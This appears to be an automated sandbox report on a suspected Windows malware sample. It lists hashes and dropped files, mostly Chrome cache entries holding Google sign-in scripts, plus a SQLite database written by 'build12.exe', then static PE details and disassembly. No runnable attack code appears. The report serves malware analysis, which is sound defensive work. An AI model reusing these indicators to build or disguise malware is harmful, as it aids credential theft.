                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (14200)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):457161
                                                                                                                                                                                                                                      Entropy (8bit):5.782208211080181
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:cy/lyddladMZ9nB7MqXAbIopNDEA+1abEeTBUgHys62mWh6uttCtt1ttg1MzY35K:jq9zAbIZeTBUWU2mRMSMCBHxxv
                                                                                                                                                                                                                                      MD5:541C48B123CDA66C4776C0DC7C30C76B
                                                                                                                                                                                                                                      SHA1:85AE6F526E0A0C8D3D787B5CDE029352A5E49538
                                                                                                                                                                                                                                      SHA-256:75DC7CAC96A4B911560D0669F9D7A6B05240C8761025248A633DD1E5E15DD56E
                                                                                                                                                                                                                                      SHA-512:82B9DE91B3E4180CD11369C6EB00476DD04C1824F0EE778F9C76075ACDC5F14D7D33BD819B18497957945EEC92A0A2BAB732991E40EF1FC0F8E8EB824EC95B05
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";_F_installCss(".O0WRkf{-webkit-user-select:none;transition:background .2s .1s;border:0;border-radius:3px;cursor:pointer;display:inline-block;font-size:14px;font-weight:500;min-width:4em;outline:none;overflow:hidden;position:relative;text-align:center;text-transform:uppercase;-webkit-tap-highlight-color:transparent;z-index:0}.A9jyad{font-size:13px;line-height:16px}.zZhnYe{transition:box-shadow .28s cubic-bezier(0.4,0,0.2,1);background:#dfdfdf;box-shadow:0px 2px 2px 0px rgba(0,0,0,.14),0px 3px 1px -2px rgba(0,0,0,.12),0px 1px 5px 0px rgba(0,0,0,.2)}.zZhnYe.qs41qe{transition:box-shadow .28s cubic-bezier(0.4,0,0.2,1);transition:background .8s;box-shadow:0px 8px 10px 1px rgba(0,0,0,.14),0px 3px 14px 2px rgba(0,0,0,.12),0px 5px 5px -3px rgba(0,0,0,.2)}.e3Duub,.e3Duub a,.e3Duub a:hover,.e3Duub a:link,.e3Duub a:visited{background:#4285f4;color:#fff}.HQ8yf,.HQ8yf a{color:#4285f4}.UxubU,.UxubU a{color:#fff}.ZFr60d{position:absolute;top:0;right:0;bottom:0;left:0;background-color:tran

                                                                                                                                                                                                                                      Chrome Cache Entry: 205

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (693)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):3141
                                                                                                                                                                                                                                      Entropy (8bit):5.381866681101836
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:o7VSeBvFfGiW0rq8sdQfydNQ8jsN4FwCYYnyTM4WCOcUkp+4pP8mLjujrFQp4rw:oA4zWynYzdOqbnyT6COm+4V8zO8w
                                                                                                                                                                                                                                      MD5:18637A7357C35DBB1A9E667CFCF52ED0
                                                                                                                                                                                                                                      SHA1:0FD3CA9D31EA8BDBD658236A8D70421F7B22F30D
                                                                                                                                                                                                                                      SHA-256:25815BE99894ED26F3B92AE4A2C542F5AE523C44C7F83CCC90E63FCE939AC50A
                                                                                                                                                                                                                                      SHA-512:BDF27DB349AEBA777DEC00EC6F505A01A5926837D9DB95BC1D3A204DC53A0AA7760DAFB8834A025B5333468B635ED875CBFFC63F771AD3682108EB711C821073
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ZwDk9d");.var Pv=function(a){_.I.call(this,a.Ha)};_.A(Pv,_.I);Pv.Na=_.I.Na;Pv.Ba=_.I.Ba;Pv.prototype.gN=function(a){return _.ke(this,{Wa:{mO:_.wj}}).then(function(b){var c=window._wjdd,d=window._wjdc;return!c&&d?new _.rh(function(e){window._wjdc=function(f){d(f);e(wEa(f,b,a))}}):wEa(c,b,a)})};var wEa=function(a,b,c){return(a=a&&a[c])?a:b.Wa.mO.gN(c)};.Pv.prototype.aa=function(a,b){var c=_.Zsa(b).yi;if(c.startsWith("$")){var d=_.Ul.get(a);_.Np[b]&&(d||(d={},_.Ul.set(a,d)),d[c]=_.Np[b],delete _.Np[b],_.Op--);if(d)if(a=d[c])b=_.je(a);else throw Error("Ob`"+b);else b=null}else b=null;return b};_.Eq(_.Oda,Pv);._.l();._.k("SNUn3");._.vEa=new _.xe(_.rf);._.l();._.k("RMhBfe");.var xEa=function(a,b){a=_.qra(a,b);return 0==a.length?null:a[0].ub},yEa=function(){return Object.values(_.Lo).reduce(function(a,b){return a+Object.keys(b).length},0)},zEa=function(){return Object.entries(_

                                                                                                                                                                                                                                      Chrome Cache Entry: 206

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 52280, version 1.0
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):52280
                                                                                                                                                                                                                                      Entropy (8bit):7.995413196679271
                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                      SSDEEP:1536:1rvqtK8DZilXxwJ8mMwAZy7phqsFLdG3B4d:xytBZits8bw4wzbFxG3B4d
                                                                                                                                                                                                                                      MD5:F61F0D4D0F968D5BBA39A84C76277E1A
                                                                                                                                                                                                                                      SHA1:AA3693EA140ECA418B4B2A30F6A68F6F43B4BEB2
                                                                                                                                                                                                                                      SHA-256:57147F08949ABABE7DEEF611435AE418475A693E3823769A25C2A39B6EAD9CCC
                                                                                                                                                                                                                                      SHA-512:6C3BD90F709BCF9151C9ED9FFEA55C4F6883E7FDA2A4E26BF018C83FE1CFBE4F4AA0DB080D6D024070D53B2257472C399C8AC44EEFD38B9445640EFA85D5C487
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:wOF2.......8.....................................^...$..4?HVAR..?MVAR9.`?STAT.*',..J/.......`..(..Z.0..R.6.$.... .....K..[..q..c..T.....>.P.j.`.w..#...%......N.".....$..3.0.6......... .L.rX/r[j.y.|*(.4.%#.....2.v.m..-..%.....;-.Y.{..&..O=#l@...k..7g..ZI...#.Z./+T..r7...M..3).Z%.x....s..sL..[A!.5*1w'/.8V..2Z..%.X.h.o.).]..9..Q`.$.....7..kZ.~O........d..g.n.d.Rw+&....Cz..uy#..fz,(.J....v.%..`..9.....h...?O..:...c%.....6s....xl..#...5..._......1.>.)"U.4 W....?%......6//!$...!.n9C@n...........!""^.....W..Z<.7.x.."UT.T....E.."R>.R..t.....H d..e_.K../.+8.Q.P.ZQ....;...U....]......._.e*......71.?.7.ORv.?...l...G|.P...|:...I.X..2.,.L........d.g.]}W#uW]QnuP-s.;.-Y.....].......C..j_.M0...y.......J..........NY..@A...,....-.F......'..w./j5g.vUS...U..0.&...y7.LP.....%.....Y......Y..D. e.A..G.?.$.......6...eaK.n5.m...N...,...+BCl..L> .E9~.b[.w.x....6<...}.e...%V....O.......*.?...a..#[eE.4..p..$...].....%......o._......N.._~..El....b..A.0.r8.....|..D.d..

                                                                                                                                                                                                                                      Chrome Cache Entry: 207

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (775)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1435
                                                                                                                                                                                                                                      Entropy (8bit):5.2889010057791275
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:kMYD70oobgQNcKYYGWn/HTwfUuH0NPIehiofo89Lay2CLtuNGbMfO+Gb6gf6LOZF:o70oo89eHuH6VeyGCZuNGbMG+GbXiP6L
                                                                                                                                                                                                                                      MD5:61F42AFCD27AEB89FE9899CA861505C6
                                                                                                                                                                                                                                      SHA1:D2F745B1479CBCA33BF3B94EAEF64BDF6E32D574
                                                                                                                                                                                                                                      SHA-256:62B5F644B254D8F4D1C41046105637B2F654CE646E07A0B70DBE13F626BAA303
                                                                                                                                                                                                                                      SHA-512:8B720EA1FB26B4E2A3BB9D161B8DEEA38EC1D9C421302C39B8145471287B0D4559C76DF0E19AE4CA51977B871580366DECF7452CFD25292F68746A39481C9559
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("bm51tf");.var rVa=!!(_.Qf[0]>>20&1);var tVa=function(a,b,c,d,e){this.fa=a;this.ta=b;this.ja=c;this.Ca=d;this.Ia=e;this.aa=0;this.da=sVa(this)},uVa=function(a){var b={};_.Ka(a.EN(),function(e){b[e]=!0});var c=a.pN(),d=a.vN();return new tVa(a.kK(),1E3*c.aa(),a.XM(),1E3*d.aa(),b)},sVa=function(a){return Math.random()*Math.min(a.ta*Math.pow(a.ja,a.aa),a.Ca)},OD=function(a,b){return a.aa>=a.fa?!1:null!=b?!!a.Ia[b]:!0};var PD=function(a){_.I.call(this,a.Ha);this.Gc=null;this.fa=a.Fa.EQ;this.ja=a.Fa.metadata;a=a.Fa.D$;this.da=a.fa.bind(a)};_.A(PD,_.I);PD.Na=_.I.Na;PD.Ba=function(){return{Fa:{EQ:_.pVa,metadata:_.oVa,D$:_.iVa}}};PD.prototype.aa=function(a,b){if(1!=this.ja.getType(a.Ed()))return _.Xk(a);var c=this.fa.aa;return(c=c?uVa(c):null)&&OD(c)?_.Fta(a,vVa(this,a,b,c)):_.Xk(a)};.var vVa=function(a,b,c,d){return c.then(function(e){return e},function(e){if(rVa)if(e instanceof

                                                                                                                                                                                                                                      Chrome Cache Entry: 208

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3178)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):320991
                                                                                                                                                                                                                                      Entropy (8bit):5.55952542701645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:uSa2hwG2WGmV9/XMwutlTzuY/JIGVkuc2qAD+j9bkV4rC7:tT+67unBNc27D+j9Nu
                                                                                                                                                                                                                                      MD5:E3BD4272D57A58D8C786A4505B7CD22C
                                                                                                                                                                                                                                      SHA1:6B9F824741B85F1E62F3F161CDC54FD94898FECC
                                                                                                                                                                                                                                      SHA-256:BA213DAB95C220206CAA657730F062F93092C1E195AF10DA242CB95F868387E7
                                                                                                                                                                                                                                      SHA-512:B0F718655628194CBD42DF5D697FAA104246CC86A8B4EFE62B310EF4DE162FEB1155ED68B7580711068CF421BB78AC6171126A705678CDC103431D0D0E73E8E9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";_F_installCss(".EE6QGf{border-bottom-style:solid;border-bottom-width:1px;padding:16px;width:100%;z-index:6;background:white;background:var(--gm3-sys-color-background,white);border-color:#c4c7c5;border-color:var(--gm3-sys-color-outline-variant,#c4c7c5);display:block;position:relative}.EE6QGf~.S7xv8,.EE6QGf~.gfM9Zd{padding-top:inherit}@media (min-width:600px){.EE6QGf{align-items:center;display:flex;left:0;position:fixed;top:0}.EE6QGf~.S7xv8,.EE6QGf~.gfM9Zd{padding-top:150px}}@media (min-width:600px) and (orientation:landscape){.EE6QGf{display:block;position:relative}.EE6QGf~.S7xv8,.EE6QGf~.gfM9Zd{padding-top:inherit}}@media (min-width:960px) and (orientation:landscape){.EE6QGf{align-items:center;display:flex;left:0;position:fixed;top:0}.EE6QGf~.S7xv8,.EE6QGf~.gfM9Zd{padding-top:150px}}.PZB4Lc{display:flex;width:100%}.YLIzab{font-family:\"Google Sans\",roboto,\"Noto Sans Myanmar UI\",arial,sans-serif;font-size:1rem;font-weight:500;letter-spacing:0rem;line-height:1.5;margin-bo

                                                                                                                                                                                                                                      Chrome Cache Entry: 209

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1299)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):114271
                                                                                                                                                                                                                                      Entropy (8bit):5.5553458905033555
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:byWA1WOEJNjYEEU0AzsWZYDq7Z3pbwQ+Fk3OTzB+9gmSeA5K2qU0UG2uioteT9:blALEJbX7Zj8k3OTzB+ymSeilG2keB
                                                                                                                                                                                                                                      MD5:F313DC5B5708A43B9EEEF5C24F67A10F
                                                                                                                                                                                                                                      SHA1:8DB79236A8CAECDE461C55994FE11235D7194F47
                                                                                                                                                                                                                                      SHA-256:5E161ACD7EAF302818E14124B8AFD174B165238FFCB2F249B0ABF22CCBC2A6E6
                                                                                                                                                                                                                                      SHA-512:E8FDFD5225D7EAED1C1AB093237915448C3F7F9DAD4E96C213F608DC1699D285A0C46E522B65BF73629A6184FF6BC5C0B1BBAF3B2F1E78BED98E5B033D0E421D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("ltDFwf");.var zvb=_.y("ltDFwf");var cU=function(a){_.J.call(this,a.Ha);var b=this.oa();this.tb=this.Ra("P1ekSe");this.kb=this.Ra("cQwEuf");this.da=b.getData("progressvalue").number(0);this.ja=b.getData("buffervalue").number(1);this.Ca=b.zb("B6Vhqe");this.Ma=b.zb("juhVM");this.ta=b.zb("D6TUi");this.aa=b.zb("qdulke");this.La=0!==this.da;this.Ka=1!==this.ja;this.Ia=[];this.fa=_.Vr(this).Xb(function(){this.Ia.length&&(this.Ia.forEach(this.f9,this),this.Ia=[]);this.La&&(this.La=!1,this.tb.ob("transform","scaleX("+this.da+")"));this.Ka&&.(this.Ka=!1,this.kb.ob("transform","scaleX("+this.ja+")"));_.Tq(b,"B6Vhqe",this.Ca);_.Tq(b,"D6TUi",this.ta);_.Tq(b,"juhVM",this.Ma);_.Tq(b,"qdulke",this.aa)}).build();this.fa();_.xg&&_.Vr(this).Xb(function(){b.pb("ieri7c")}).Ce().build()();_.Hz(this.oa().el(),this.Sa.bind(this))};_.A(cU,_.J);cU.Ba=_.J.Ba;.cU.prototype.Sa=function(a,b){Avb(this

                                                                                                                                                                                                                                      Chrome Cache Entry: 210

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):52
                                                                                                                                                                                                                                      Entropy (8bit):4.542000661265563
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:yVkxzNDrMKcwVbF7KnZ:yVkxtkwVbF7KZ
                                                                                                                                                                                                                                      MD5:B3B89B9C275343BC6798E3A83564FDDB
                                                                                                                                                                                                                                      SHA1:32367475C527C3F5E5DB0BF42C348816FF4D157B
                                                                                                                                                                                                                                      SHA-256:900FB968F7FD9EA55F600AC9002A89E56AB56597DA7BDE04DEAAE6CC77AEB276
                                                                                                                                                                                                                                      SHA-512:ADB6938104E802B0936630B216CDE732F21ECA6E60E7A31D1B9C8FF52B5A66A712A7ECDE3F8ED4915D15C0A71C33A9788060E1E22999094C39020A1F8C636874
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:CiUKDQ0ZARP6GgQIVhgCIAEKCw3oIX6GGgQISxgCCgcN05ioBxoA

                                                                                                                                                                                                                                      Chrome Cache Entry: 211

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (467)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1884
                                                                                                                                                                                                                                      Entropy (8bit):5.292262488069745
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:o7YQTzKjrL3AnFw4paFNW7xOkZfIt3UrkCq/srw:otoLcFx4kRIes4w
                                                                                                                                                                                                                                      MD5:2DB6AB32BE79D1F4C092D251080FD3FF
                                                                                                                                                                                                                                      SHA1:393B0124159B4B7269CABA1991D8BB0F24EBF073
                                                                                                                                                                                                                                      SHA-256:523799F3A4E2A3F4A453A43AC03CD6B01EFAC005DAB66CE87277B9CCEC7BB67F
                                                                                                                                                                                                                                      SHA-512:6D6DDA518FB82DE0D554B21810CC33A8C4708043377F4BA5C8AD1372DACAE52A02213C4A919EBF3AF27BEBFCE5432BAF0346A3E823A65AE442D1B9AF6D60BDFA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._.k("iAskyc");._.ZX=function(a){_.I.call(this,a.Ha);this.window=a.Fa.window.get();this.Bc=a.Fa.Bc};_.A(_.ZX,_.I);_.ZX.Na=_.I.Na;_.ZX.Ba=function(){return{Fa:{window:_.Hq,Bc:_.NB}}};_.ZX.prototype.Yn=function(){};_.ZX.prototype.addEncryptionRecoveryMethod=function(){};_.$X=function(a){return(null==a?void 0:a.lq)||function(){}};_.aY=function(a){return(null==a?void 0:a.sca)||function(){}};_.bY=function(a){return(null==a?void 0:a.Sn)||function(){}};._.JBb=function(a){return new Map(Array.from(a,function(b){var c=_.n(b);b=c.next().value;c=c.next().value;return[b,c.map(function(d){return{epoch:d.epoch,key:new Uint8Array(d.key)}})]}))};_.KBb=function(a){setTimeout(function(){throw a;},0)};_.ZX.prototype.uJ=function(){return!0};_.Eq(_.Cl,_.ZX);._.l();._.k("ziXSP");.var AY=function(a){_.ZX.call(this,a.Ha)};_.A(AY,_.ZX);AY.Na=_.ZX.Na;AY.Ba=_.ZX.Ba;AY.prototype.Yn=function(a,b,c){var d;

                                                                                                                                                                                                                                      Chrome Cache Entry: 212

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):220329
                                                                                                                                                                                                                                      Entropy (8bit):5.4443770705809635
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:4btvBkNQB0w3NSOm3Rt9whvd6Ptfk/7aNyHD9KhLh:A0a0wNmBwK67cyj4hLh
                                                                                                                                                                                                                                      MD5:4441DDED9C24D3329776DD10688D12A8
                                                                                                                                                                                                                                      SHA1:07FF661EB06DDD8858DA4B7AEE259597346D4881
                                                                                                                                                                                                                                      SHA-256:58D7D9D54FF03332C13E22B4471FA7FD3834E070934CB969AE3DEBCB05DEF767
                                                                                                                                                                                                                                      SHA-512:B4F891DB471F20287A21E6482B4E3C7A9D41422DCBF5F2DC08482C61FEC6D565279CA8DA3F7ABD944B5AD226C957CB10F4395760071B3A5DD030F635F3FA5C79
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:"use strict";this.default_AccountsSignInUi=this.default_AccountsSignInUi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x3a22c03e, 0x800b1c4, 0x3e079c46, 0x10814500, 0x6, 0x0, 0x201ad000, 0x199, ]);./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/./*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.. Names of events that are special to jsaction. These are not all. event types that are legal to use in either HTML or the addEvent(). API, but these are the ones that are treated specially. All other. DOM events can be used in either addEvent() or in the value of the. jsaction attribute. Beware of browser specific events or events. that don't bubble though: If they are not mentioned he

                                                                                                                                                                                                                                      unknown (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000187001\build12.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Entropy (8bit):6.559828656405516
                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                      File name:SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5:f854143c49c4d2fa4cf73bab97ba8d3a
                                                                                                                                                                                                                                      SHA1:62454e89cf9b2558347e2179f49fb4a56f4762ec
                                                                                                                                                                                                                                      SHA256:8c8afd00e6087780e4ee0a36f170ba06f13ba6d0c46cd2119b876e88d40c24e3
                                                                                                                                                                                                                                      SHA512:c0454ed9124cd768b0e6c8090f5943f7828263b94d00138b8a208fd59e52c28329ea4cc466ee7830471d5f765ca5c9bfc1b48bdc7a5352bec0a3e2c882c7b519
                                                                                                                                                                                                                                      SSDEEP:49152:hz28Myn3uFDrmGjA1n1Nrd/O9LunYp6VyiW9k2MYD:p28pn3yD6F7rd/OrYyiT2M
                                                                                                                                                                                                                                      TLSH:85D529A2A50B76CBD88E17749567CE827A7D46FA472048C3986CF47A7DA3CC131B5C38
                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.Y@...@...@....m..Q....m.......h..R....h..W....h..5....m..U....m..S...@........k..A....k1.A....k..A...Rich@...........PE..L..

                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Entrypoint:0x70d000
                                                                                                                                                                                                                                      Entrypoint Section:.taggant
                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                      Time Stamp:0x65E4126F [Sun Mar 3 06:02:23 2024 UTC]
                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                      jmp 00007FC73503469Ah
                                                                                                                                                                                                                                      movlps xmm5, qword ptr [00000000h]
                                                                                                                                                                                                                                      add cl, ch
                                                                                                                                                                                                                                      add byte ptr [eax], ah
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [edx], al
                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], dl
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [ebx], al
                                                                                                                                                                                                                                      or al, byte ptr [eax]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [edi], al
                                                                                                                                                                                                                                      add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add cl, byte ptr [edx]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add dword ptr [eax], eax
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      or byte ptr [eax+00000000h], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add cl, byte ptr [edx]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      xor byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      or byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      and al, byte ptr [eax]
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      adc byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                                                      add byte ptr [eax], al
